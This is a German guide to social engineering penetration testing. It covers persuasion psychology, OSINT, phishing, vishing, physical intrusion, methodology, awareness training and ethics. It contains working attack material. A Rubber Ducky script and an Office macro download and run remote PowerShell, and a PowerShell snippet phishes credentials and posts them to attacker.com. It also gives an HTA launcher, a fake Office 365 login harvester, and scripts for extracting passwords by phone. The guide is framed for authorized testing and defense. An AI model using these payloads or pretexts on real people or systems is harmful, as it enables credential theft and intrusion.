ALAKEEL

Social Engineering Pentesting

Was ist Social Engineering Pentesting?

Social Engineering Pentesting testet die menschliche Schwachstelle in Sicherheitssystemen. Du simulierst Angriffe, bei denen Mitarbeiter manipuliert werden, um:

  • Zugangsdaten preiszugeben
  • Malware auszuführen
  • Sicherheitsrichtlinien zu umgehen
  • Physischen Zugang zu gewähren

Rechtlicher Rahmen (KRITISCH UND WICHTIG!)

Ohne diese Grundlagen landest du im Gefängnis:

  • Schriftliche Genehmigung (RoE – Rules of Engagement): Detaillierter Vertrag mit Scope, erlaubten Methoden, Zeiträumen
  • Get-Out-of-Jail-Card: Notfallkontakte und Autorisierungsdokumente immer dabei
  • DSGVO-Konformität: Datenschutz bei Datensammlung über Personen
  • Strafrechtliche Grenzen: §202a StGB (Ausspähen von Daten), §303a/b StGB (Datenveränderung)
  • Eskalationspfade: Klare Regeln, wann Tests abgebrochen werden

Psychologische Grundlagen

Kern-Prinzipien nach Cialdini

Diese 6 Prinzipien sind deine Werkzeuge:

1. Autorität

  • Menschen gehorchen Autoritätspersonen
  • Beispiel: „Ich bin von der IT-Abteilung, Ihr PC muss dringend aktualisiert werden“
  • Techniken: Uniformen, Titel, selbstsicheres Auftreten

2. Reziprozität (Gegenseitigkeit)

  • Menschen fühlen sich verpflichtet, Gefallen zu erwidern
  • Beispiel: Kleines Geschenk vor der Bitte um Informationen
  • Techniken: „Ich helfe Ihnen kurz, können Sie mir dann…?“

3. Social Proof (Soziale Bewährtheit)

  • Menschen orientieren sich an anderen
  • Beispiel: „Alle anderen Abteilungen haben das schon gemacht“
  • Techniken: Gruppendruck, „Jeder macht das so“

4. Knappheit

  • Dringlichkeit erzeugt Handlungsdruck
  • Beispiel: „Ihr Account wird in 24h gesperrt!“
  • Techniken: Zeitdruck, begrenzte Verfügbarkeit

5. Sympathie

  • Wir sagen eher Ja zu Menschen, die wir mögen
  • Beispiel: Small Talk, Gemeinsamkeiten finden
  • Techniken: Spiegeln, Komplimente, gemeinsame Interessen

6. Commitment & Konsistenz

  • Menschen bleiben ihren Entscheidungen treu
  • Beispiel: Kleine Zusage, dann größere Bitte
  • Techniken: „Foot-in-the-door“, schrittweise Eskalation
Kognitive Verzerrungen (Cognitive Biases)
  • Confirmation Bias: Menschen glauben, was ihre Annahmen bestätigt (Man bestätigt, was man sowieso glaubt.)
    • Fake-Mail, die gängige Annahmen bestätigt („Ihr Passwort läuft regelmäßig ab“).
    • IT-Update-Mails, die „typisch“ aussehen.
    • Bekannte interne Logos oder Begriffe verwenden.
    • „Das passiert immer wieder, ich kenne das schon.“
    • Informationen nutzen, die Mitarbeiter bereits erwarten.
    • Erwartete Routine-Aktionen verstärken („Wie gewohnt…“).
    • Formulare im bekannten Stil nachbauen.
  • Authority Bias: Übermäßiges Vertrauen in Autoritäten
    • Hinweise auf den „IT-Sicherheitsbeauftragten“.
    • „Die Geschäftsführung hat zugestimmt.“
    • Verweis auf „offizielle Richtlinien“.
    • Fake-Auditor mit Klemmbrett.
    • Hochoffiziell klingende Sprache.
    • Kleidung / Ausweis, der wie „Corporate“ wirkt.
    • „Der Abteilungsleiter weiß Bescheid.“
  • Bandwagon Effect: „Alle machen es, also ist es sicher“
    • „Die meisten Mitarbeiter haben das Formular bereits eingereicht.“
    • „Letzte Woche haben 98 % daran teilgenommen.“
    • „Die HR-Abteilung nutzt das schon.“
    • „Ihr Teamkollege hat es auch bestätigt.“
    • Gruppenbasierte Deadlines.
    • „Das ist jetzt Standard.“
    • Hinweise auf Trends („Alle Standorte nutzen das Tool jetzt.“)
  • Dunning-Kruger-Effekt: Selbstüberschätzung bei Sicherheitskenntnissen
    • „Das ist ein ganz einfaches IT-Thema“ → Mitarbeiter fühlen sich kompetent.
    • „Das kann jeder lösen“ → führt zu Handlung ohne Absicherung.
    • „Nur ein kleiner technischer Check – nichts Wildes.“
    • „Das kennen Sie bestimmt.“
    • „Sie sind doch schon lange im Unternehmen…“
    • „Das versteht jeder.“
    • „Sie wissen sicher, wie das geht.“

OSINT – Open Source Intelligence

Informationsbeschaffung (Pre-Engagement)

Ziele:

  • Unternehmensstruktur verstehen
  • Zielpersonen identifizieren
  • Angriffsvektoren finden
  • Pretexting-Material sammeln

Praktische Tools & Techniken:

A. Unternehmensrecherche

- LinkedIn: Organigramm, Mitarbeiter, Technologien
- Xing (in DACH-Region wichtig)
- Handelsregister: Geschäftsführer, Gesellschafter
- Unternehmenswebsite: Technologie-Stack (Wappalyzer)
- Stellenanzeigen: verwendete Technologien, interne Tools
- Pressemitteilungen: aktuelle Projekte, Partnerschaften

B. Personenrecherche

Tools:
- theHarvester: E-Mail-Adressen sammeln
- Hunter.io: E-Mail-Formate identifizieren
- Maltego: Beziehungsnetzwerke visualisieren
- Recon-ng: Framework für OSINT
- SpiderFoot: Automatisierte OSINT-Sammlung
- OSRF (OSINT Reconnaissance Framework)

Social Media:
- LinkedIn: Karriereverlauf, Kontakte, Skills
- Facebook/Instagram: persönliche Interessen, Familie
- Twitter/X: Meinungen, Vernetzung
- GitHub: Code-Repositories, technische Skills
- Stack Overflow: Problemstellungen, Wissensstand

C. Technische Reconnaissance

# Subdomain-Enumeration
sublist3r -d target.com
amass enum -d target.com

# E-Mail-Format herausfinden
theharvester -d target.com -b google,linkedin

# Metadata von öffentlichen Dokumenten
exiftool dokument.pdf
metagoofil -d target.com -t pdf,doc,xls

# Whois-Informationen
whois target.com

# DNS-Informationen
nslookup target.com
dig target.com ANY

D. Fortgeschrittenes OSINT

  • Google Dorks: site:target.com filetype:pdf "vertraulich"
  • Wayback Machine: Alte Versionen der Website
  • Shodan: Exponierte Systeme und Dienste
  • Have I Been Pwned: Geleakte Credentials
  • Dehashed: Breach-Datenbanken durchsuchen

Angriffsvektoren im Detail

A. Phishing (Remote)

Typen:

  1. Spear Phishing: Gezielt auf Einzelpersonen
  2. Whaling: Targeting von C-Level Executives
  3. Clone Phishing: Kopie legitimer E-Mails
  4. Smishing: SMS-basiert
  5. Vishing: Voice/Telefon-basiert

Praktische Umsetzung:

E-Mail-Phishing Setup:

# Tool: GoPhish (Open Source Phishing Framework)
1. Kampagne erstellen:
   - Landing Page (Fake-Login)
   - E-Mail-Template
   - Zielgruppe definieren

2. Domain-Setup:
   - Ähnliche Domain registrieren (typosquatting)
   - SSL-Zertifikat (Let's Encrypt)
   - SPF/DKIM/DMARC konfigurieren (Authentizität)

3. E-Mail-Server:
   - Eigener SMTP-Server oder Dienst
   - IP-Reputation aufbauen
   - Spam-Filter-Tests

# Alternative Tools:
- King Phisher
- Social Engineering Toolkit (SET)
- Evilginx2 (für MFA-Bypass)

E-Mail-Crafting Best Practices:

  • Pretext glaubwürdig: Bezug zu realen Ereignissen im Unternehmen
  • Dringlichkeit ohne Panik: „Bitte bis heute Abend“
  • Legitimität signalisieren: Korrekte Signatur, Logo, Formatierung
  • Klarer Call-to-Action: Was soll der Empfänger tun?
  • Fehler vermeiden: Rechtschreibung, Grammatik perfekt

Beispiel-Szenarien:

1. IT-Support:
   "Ihr Passwort läuft ab, bitte über folgenden Link zurücksetzen"

2. HR-Themen:
   "Neue Urlaubsregelung, bitte Formular ausfüllen" (PDF mit Makros)

3. CEO-Fraud:
   "Dringende Überweisung für Projekt X, vertraulich" (an Buchhaltung)

4. Paketlieferung:
   "Ihre Sendung konnte nicht zugestellt werden" (besonders effektiv)

5. Security Alert:
   "Verdächtige Anmeldung erkannt, Account verifizieren"

B. Vishing (Voice Phishing)

Vorbereitung:

  • Anrufer-ID spoofing (tools: SpoofCard, aber rechtlich kritisch!)
  • Hintergrundgeräusche (Büro, Call-Center) über Software
  • Skript vorbereiten, aber natürlich klingen
  • OSINT-Informationen griffbereit

Techniken:

1. Helpdesk-Impersonation:
   - "IT-Helpdesk hier, wir haben ein Problem mit Ihrem Account erkannt"
   - Nach Usernamen fragen (oft gegeben), dann "Passwort zur Verifizierung"

2. Vorgesetzten-Impersonation:
   - "Hier [Name vom CEO], ich bin gerade beim Kunden, brauche dringend..."
   - Druck aufbauen, Autorität nutzen

3. Lieferanten/Partner:
   - "Rechnungsdaten haben sich geändert" (Banking-Änderung)
   - Glaubwürdigkeit durch Insider-Wissen

4. Behörden-Impersonation (VORSICHT - rechtlich problematisch):
   - Nur mit expliziter Genehmigung!

Psychologische Aspekte:

  • Stimme: Ruhig, selbstsicher, freundlich aber bestimmt
  • Tempo: Nicht zu langsam (verdächtig), nicht zu schnell (nervös)
  • Pausen: Nachdenken simulieren, natürlich wirken
  • Emotionale Manipulation: Sympathie aufbauen, dann bitten
C. Physical Pentesting

Reconnaissance:

  • Gebäude-Layout (Google Maps, Street View)
  • Sicherheitsmaßnahmen (Kameras, Wachen, Badge-Reader)
  • Mitarbeiter-Routinen (Raucherpausen, Stoßzeiten)
  • Müll-Analyse (Dumpster Diving – rechtlich prüfen!)

Zugangs-Techniken:

1. Tailgating/Piggybacking

Szenario: Mit berechtigtem Mitarbeiter mitgehen
- Hände voll (Kaffees, Pakete) -> jemand hält Tür auf
- "Badge vergessen, bin von [Abteilung]"
- In Gruppe mitgehen (soziale Dynamik)
- Raucher begleiten (zurück ins Gebäude)

2. Badge-Cloning

Tools:
- Proxmark3: RFID/NFC-Analyse und Cloning
- Chameleon Mini: Emulation verschiedener Cards
- HID-Tools: Für HID Proximity Cards

Vorgehen:
1. Badge auslesen (z.B. im Aufzug dicht bei Person)
2. Auf leere Karte schreiben
3. Testen an niedrig-sensitiven Bereichen

3. Lock Picking (nur mit Erlaubnis!)

Skills:
- Single Pin Picking (SPP)
- Raking
- Bump Keys
- Bypass-Tools (Under-Door-Tool, Traveler Hook)

Tools:
- Lock Pick Set (Sparrows, Peterson)
- Tension Tools
- Bypass-Tools für Türklinken

4. Pretext-Szenarien

1. Wartungstechniker:
   - Uniform (Heizung, Klima, IT)
   - Werkzeugkoffer
   - Selbstverständliches Auftreten
   - "Ich bin für die jährliche Wartung hier"

2. Lieferant:
   - Paket/Lieferung für jemanden
   - Empfangsbereich nutzen
   - "Wo kann ich das abstellen?"

3. Interviewer/Bewerber:
   - Vorgetäuschter Termin
   - "Ich bin zu früh, kann ich warten?"
   - Reconnaissance während Wartezeit

4. Reinigungspersonal:
   - Oft unsichtbar, Zugang zu vielen Bereichen
   - Abendstunden nutzen
   - Weniger Mitarbeiter → weniger Fragen

5. Geschäftspartner:
   - "Meeting mit [Name]"
   - Selbstsicheres Auftreten
   - Empfang überwinden

Ausrüstung für Physical Pentests:

Basis:
- Clipboard (wirkt offiziell)
- Gefälschte Badge/Ausweise (generisch, nicht spezifisch)
- Angemessene Kleidung (Business, Techniker-Outfit)
- Handy als Prop ("Telefonat" während Tailgating)

Fortgeschritten:
- Versteckte Kamera (rechtlich prüfen!)
- USB Rubber Ducky (automatisierte Payload-Ausführung)
- WiFi Pineapple (Rogue Access Point)
- LAN Turtle (Netzwerk-Implant)
- KeyGrabber (Hardware Keylogger - sehr invasiv!)
D. Baiting (Köder-Angriffe)

USB-Drop:

Vorbereitung:
1. USB-Sticks mit Payloads präparieren
   - Rubber Ducky Scripts
   - BadUSB (umprogrammierter Chip als Tastatur)
   - Oder einfach: Autorun mit Dokument (Makros)

2. Labeling:
   - "Gehaltsabrechnungen 2024"
   - "Vertraulich - Vorstand"
   - "Projekt X - Budget"
   - "Urlaubsfotos" (persönlicher)

3. Platzierung:
   - Parkplatz
   - Raucherbereich
   - Aufzug
   - Kantine
   - Konferenzräume

Technisch (Beispiel Rubber Ducky):
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -Command "IEX(New-Object Net.WebClient).DownloadString('http://pentester.com/payload.ps1')"
ENTER

Physische Köder:

  • Gefälschte QR-Codes (auf „offizielle“ Malware-Seite)
  • Präparierte Ladegeräte (O.MG Cable – USB-Kabel mit Implant)
  • „Verlorene“ Firmen-Hardware mit Malware

Technische Skills

A. Payload-Entwicklung

Office-Makros (klassisch, aber noch effektiv):

' Beispiel: Einfache Reverse Shell via VBA Macro
Sub AutoOpen()
    Call ExecutePayload
End Sub

Sub Document_Open()
    Call ExecutePayload
End Sub

Sub ExecutePayload()
    Dim cmd As String
    cmd = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""IEX(New-Object Net.WebClient).DownloadString('http://pentester.com/payload.ps1')"""
    Shell cmd, vbHide
End Sub

PowerShell (für Windows-Umgebungen):

# Credential Harvesting
$cred = Get-Credential -Message "Windows Update benötigt Ihre Anmeldedaten"
$user = $cred.UserName
$pass = $cred.GetNetworkCredential().Password

# Exfiltration
$data = "User: $user | Pass: $pass"
Invoke-WebRequest -Uri "http://attacker.com/log.php" -Method POST -Body $data

# Alternative: Empire/Covenant Framework nutzen

HTA (HTML Application):

<html>
<head>
<script language="VBScript">
  Set objShell = CreateObject("WScript.Shell")
  objShell.Run "powershell -w hidden -enc [BASE64_PAYLOAD]", 0
  window.close()
</script>
</head>
<body>
</body>
</html>
B. Tool-Stack für Profis

Frameworks:

1. Social Engineering Toolkit (SET)
   - Spear Phishing
   - Website Attack Vectors
   - Infectious Media Generator
   - Credential Harvester

2. BeEF (Browser Exploitation Framework)
   - Browser-Hooking
   - Client-seitige Angriffe
   - Post-Exploitation

3. Metasploit
   - Payload-Generierung
   - Post-Exploitation Modules
   - Integration mit anderen Tools

4. GoPhish
   - Professionelles Phishing-Framework
   - Campaign Management
   - Tracking & Reporting

5. Evilginx2
   - MFA-Bypass via Reverse Proxy
   - Session-Hijacking
   - Fortgeschrittenes Phishing

Spezialisierte Tools:

OSINT:
- Maltego: Visualisierung
- theHarvester: Email-Sammlung
- Recon-ng: Modular framework
- SpiderFoot: Automatisierung

Credentials:
- Mimikatz: Windows Credential Extraction
- LaZagne: Multi-Platform Credential Recovery
- CredNinja: Credential Validation

Physical:
- Proxmark3: RFID/NFC
- WiFi Pineapple: Rogue AP
- USB Rubber Ducky: HID-Attacks
- LAN Turtle: Network Implants
C. Coding-Skills

Python (unverzichtbar):

# Beispiel: Einfacher Credential Harvester
from flask import Flask, request, render_template_string

app = Flask(__name__)

LOGIN_PAGE = '''
<!DOCTYPE html>
<html>
<head><title>Office 365 Login</title></head>
<body>
<h2>Microsoft Office 365</h2>
<form method="POST" action="/submit">
    <input type="text" name="username" placeholder="Email"><br>
    <input type="password" name="password" placeholder="Passwort"><br>
    <input type="submit" value="Anmelden">
</form>
</body>
</html>
'''

@app.route('/')
def login():
    return render_template_string(LOGIN_PAGE)

@app.route('/submit', methods=['POST'])
def submit():
    user = request.form.get('username')
    pwd = request.form.get('password')
    
    # Credentials loggen
    with open('harvested.txt', 'a') as f:
        f.write(f"{user}:{pwd}\n")
    
    # Redirect zu echter Login-Seite
    return redirect('https://login.microsoftonline.com')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')

Bash-Scripting (Automation):

#!/bin/bash
# OSINT Automation Script

TARGET=$1
OUTPUT_DIR="osint_${TARGET}"

mkdir -p $OUTPUT_DIR

# Subdomain Enumeration
echo "[*] Running subdomain enumeration..."
sublist3r -d $TARGET -o $OUTPUT_DIR/subdomains.txt

# Email Harvesting
echo "[*] Harvesting emails..."
theharvester -d $TARGET -b all -f $OUTPUT_DIR/emails.html

# DNS Information
echo "[*] Gathering DNS info..."
dig $TARGET ANY > $OUTPUT_DIR/dns_info.txt

# Technology Detection
echo "[*] Detecting technologies..."
whatweb $TARGET > $OUTPUT_DIR/technologies.txt

echo "[+] OSINT gathering complete. Results in $OUTPUT_DIR/"

Weitere wichtige Sprachen:

  • PowerShell: Windows-Umgebungen
  • JavaScript: Browser-basierte Angriffe
  • Ruby: Metasploit-Module entwickeln
  • Go: Moderne Toolentwicklung (schnell, kompiliert)

Methodik & Prozess

Standardisierter SE-Pentest-Ablauf

Phase 1: Pre-Engagement (Planung)

Dauer: 1-2 Wochen

Aktivitäten:
✓ Kick-off Meeting mit Kunde
✓ Rules of Engagement definieren
✓ Scope festlegen (Abteilungen, Personen, Methoden)
✓ Eskalationspfade etablieren
✓ Rechtliche Dokumente unterschreiben
✓ Success-Kriterien definieren
✓ Notfallkontakte festlegen

Deliverables:
- Unterschriebener Vertrag
- RoE-Dokument
- Scope-Statement
- Projektplan

Phase 2: Information Gathering (OSINT)

Dauer: 1-2 Wochen

Aktivitäten:
✓ Unternehmensrecherche
✓ Personenprofile erstellen
✓ Technologie-Stack identifizieren
✓ Potenzielle Angriffsvektoren identifizieren
✓ Pretexting-Material sammeln
✓ Organizational Chart erstellen

Deliverables:
- OSINT-Report
- Target-Liste
- Pretext-Szenarien

Phase 3: Pretext Development (Vorbereitung)

Dauer: 3-5 Tage

Aktivitäten:
✓ Angriffs-Szenarien entwickeln
✓ Infrastruktur aufsetzen (Domains, Server, Tools)
✓ Payloads erstellen und testen
✓ Landing Pages/Email-Templates erstellen
✓ Testing in isolierter Umgebung

Deliverables:
- Getestete Payloads
- Funktionale Infrastruktur
- Pretext-Skripte

Phase 4: Attack Execution (Durchführung)

Dauer: 1-3 Wochen (je nach Scope)

Aktivitäten:
✓ Phishing-Kampagnen starten
✓ Vishing-Calls durchführen
✓ Physical Penetration Attempts
✓ Monitoring und Logging aller Aktivitäten
✓ Erfolge dokumentieren
✓ Anpassungen bei Bedarf

Wichtig:
- Echtzeitdokumentation
- Respekt für gestresste Mitarbeiter
- Abbruch bei Eskalation
- Regelmäßige Updates an Ansprechpartner

Phase 5: Post-Exploitation (Optional)

Falls initial compromise erfolgreich:

✓ Lateral Movement testen
✓ Privilege Escalation versuchen
✓ Persistence etablieren (mit Erlaubnis)
✓ Data Exfiltration simulieren
✓ Post-Exploitation-Pfade dokumentieren

Ziel: Zeigen, was nach initial compromise möglich ist

Phase 6: Reporting & Debriefing

Dauer: 1-2 Wochen

Report-Struktur:
1. Executive Summary (für Management)
   - High-Level Findings
   - Business Impact
   - Strategic Recommendations

2. Technical Details
   - Methodik
   - Timeline der Angriffe
   - Erfolgreiche/fehlgeschlagene Versuche
   - Screenshots, Logs, Beweise

3. Findings & Vulnerabilities
   - Nach Severity sortiert (Critical, High, Medium, Low)
   - Betroffene Abteilungen/Personen
   - Technische Details
   - Proof of Concept

4. Remediation Roadmap
   - Sofortmaßnahmen (Quick Wins)
   - Mittelfristige Maßnahmen
   - Langfristige Strategie
   - Training-Empfehlungen

5. Awareness-Training Material
   - Lesson Learned
   - Konkrete Beispiele aus dem Test
   - Best Practices

Deliverables:
- Detaillierter Report (50-150 Seiten)
- Executive Presentation (Slides)
- Awareness-Training (Workshop)
- Video/Screenshots als Beweismaterial

Awareness Training & Defense

Mitarbeiter-Schulung entwickeln

Training-Inhalte:

1. Phishing Recognition
   - URL-Überprüfung (hover, echte Domain)
   - Sender-Verifikation
   - Verdächtige Anhänge
   - Ungewöhnliche Anfragen
   - Grammatik/Rechtschreibfehler (nicht mehr so zuverlässig!)

2. Vishing Awareness
   - Callback-Verfahren (niemals direkt Infos geben)
   - Verifizierung durch bekannte Nummern
   - Keine Credentials am Telefon
   - Druck erkennen und zurückweisen

3. Physical Security
   - Badge-Checking
   - Tailgating verhindern
   - Fremde ansprechen
   - Clean Desk Policy
   - Sichere Dokumentenvernichtung

4. Reporting Culture
   - Wie melde ich einen Vorfall?
   - Keine Schuldzuweisungen
   - Belohnung für Meldungen

Gamification-Ansätze:

  • Phishing-Simulation mit Punktesystem
  • „Hacker des Monats“ (wer am meisten meldet)
  • Zertifikate für erfolgreiche Teilnahme
  • Abteilungs-Challenges
Security Culture aufbauen

Für Kunden empfehlen:

Technische Maßnahmen:
✓ Email-Security (SPF, DKIM, DMARC)
✓ Advanced Threat Protection (ATP)
✓ MFA überall (bevorzugt FIDO2)
✓ Endpoint Detection & Response (EDR)
✓ Network Segmentation
✓ USB-Port Kontrolle (Device Control)
✓ Badge-Systeme mit Biometrie

Organisatorische Maßnahmen:
✓ Security Awareness Trainings (quartalsweise)
✓ Simulierte Phishing-Kampagnen (monatlich)
✓ Incident Response Plan
✓ Clear Desk/Clear Screen Policy
✓ Besuchermanagement
✓ Hintergrundchecks bei sensitiven Positionen

Kulturelle Maßnahmen:
✓ Security Champions in Abteilungen
✓ Offene Fehlerkultur
✓ Regelmäßige Security-Updates
✓ Management-Vorbildfunktion
✓ Belohnungssystem für Security-Meldungen

Ethik & Professionalität

Ethische Grenzen

Was du NIEMALS tun darfst:

  • Außerhalb des Scopes agieren
  • Persönliche Daten für andere Zwecke nutzen
  • Erpressung oder echte Schäden verursachen
  • Daten exfiltrieren (außer mit expliziter Erlaubnis)
  • Emotionalen Schaden verursachen (Trauma)
  • Whistleblower oder vulnerable Personen targeten

Gray Areas (immer mit Kunden klären):

  • Wie weit darf physischer Zugang gehen?
  • Dürfen Kameras umgangen werden?
  • Ist Dumpster Diving erlaubt?
  • Dürfen persönliche Social Media genutzt werden?
  • Wie mit sensitiven entdeckten Informationen umgehen?
Professionelle Standards

Red Teaming Code of Ethics:

1. Zustimmung ist obligatorisch
2. Minimiere Schaden
3. Respektiere Privatsphäre
4. Ehrlichkeit in Reporting
5. Kontinuierliche Weiterbildung
6. Verantwortungsvolle Disclosure
7. Keine Doppelverwertung von Ergebnissen
8. Vertraulichkeit wahren

Reporting-Integrität:

  • Alle Versuche dokumentieren (auch fehlgeschlagene)
  • Keine Ergebnisse „aufhübschen“
  • Ehrlich über Erfolge und Misserfolge berichten
  • Constructive Feedback geben, nicht bloßstellen
  • Positive Aspekte hervorheben (was funktioniert gut)

Karriereentwicklung

Von Junior zu Senior

Junior Level (0-2 Jahre):

Skills:
- Basis OSINT
- Einfache Phishing-Kampagnen
- Guided Physical Tests
- Tool-Bedienung
- Report-Assistenz

Ziele:
- Zertifizierungen (z.B. OSCP, CEH)
- Erste eigene Projekte
- Shadowing von Seniors

Mid Level (2-5 Jahre):

Skills:
- Fortgeschrittenes OSINT
- Komplexe Pretexting
- Eigenständige Physical Tests
- Custom Payload Development
- Eigenständiges Reporting

Ziele:
- Spezialisierung (Physical/Remote/Vishing)
- Fortgeschrittene Zertifikate (OSEP, GPEN)
- Mentoring von Juniors

Senior Level (5+ Jahre):

Skills:
- Expert-Level Technical Skills
- Psychologisches Tiefenverständnis
- Complex Red Team Operations
- Custom Tool Development
- Client-Facing Presentations
- Team Leadership

Verantwortungen:
- Projekt-Planung & -Leitung
- Methodik-Entwicklung
- Sales-Support (Scoping)
- Training & Mentoring
- Thought Leadership (Konferenzen, Blogs)
- Strategic Advisory für Kunden

Zertifizierungen (priorisiert)

Essentiell:

1. OSCP (Offensive Security Certified Professional)
   - Fokus: Technical Pentesting
   - Warum: Industrie-Standard, praktisch

2. GPEN (GIAC Penetration Tester)
   - Fokus: Methodologie
   - Warum: Anerkennung, breites Wissen

3. OSEP (Offensive Security Experienced Penetration Tester)
   - Fokus: Advanced Evasion
   - Warum: Nächster Level nach OSCP

Spezialisiert für SE:

4. SEC564: Red Team Operations (SANS)
   - Fokus: Social Engineering & Physical
   - Warum: Direkt relevant

5. SCYTHE Purple Team Adversary Emulation
   - Fokus: Advanced Adversary Tactics
   - Warum: Moderne Ansätze

6. Advanced Social Engineering (Offensive Security)
   - Fokus: SE-Techniken
   - Warum: Spezialisierung auf SE-Domain

7. CRTO (Certified Red Team Operator)
   - Fokus: Red Team Operations
   - Warum: Moderne C2-Frameworks, Cobalt Strike

8. CRTP (Certified Red Team Professional)
   - Fokus: Active Directory Attacks
   - Warum: Enterprise-Umgebungen

Psychologie & Soft Skills:
9. NLP Practitioner (Neuro-Linguistic Programming)
   - Fokus: Kommunikation & Überzeugung
   - Warum: Verbessertes Pretexting

10. Verhandlungstraining
   - Fokus: Persuasion-Techniken
   - Warum: Vishing & Client-Kommunikation

Bücher (Must-Read):

  1. „The Art of Deception“ – Kevin Mitnick
  2. „Social Engineering: The Science of Human Hacking“ – Christopher Hadnagy
  3. „Ghost in the Wires“ – Kevin Mitnick
  4. „Influence: The Psychology of Persuasion“ – Robert Cialdini
  5. „Unmasking the Social Engineer“ – Christopher Hadnagy
  6. „The Art of Invisibility“ – Kevin Mitnick
  7. „Thinking, Fast and Slow“ – Daniel Kahneman (Psychologie)
  8. „Pre-Suasion“ – Robert Cialdini
  9. „No Tech Hacking“ – Johnny Long
  10. „Advanced Penetration Testing“ – Wil Allsopp

Blogs & Ressourcen:

  • Social-Engineer.org (Christopher Hadnagy)
  • Pentestmonkey Cheat Sheets
  • HackerOne Disclosed Reports
  • Reddit: r/netsec, r/AskNetsec
  • Medium: InfoSec Write-ups
  • SANS Reading Room (White Papers)

Konferenzen & Events:

International:

  • DEF CON (Las Vegas) – Social Engineering CTF
  • Black Hat (Las Vegas/Europa)
  • DEF CON SE Village
  • BSides (weltweit, verschiedene Städte)
  • RSA Conference

DACH-Region:

  • TROOPERS (Heidelberg)
  • Hack.lu (Luxemburg)
  • DeepSec (Wien)
  • Swiss Cyber Storm (Schweiz)
  • IT-Sicherheitskonferenz (verschiedene)

In

, , , , , , , , , , , ,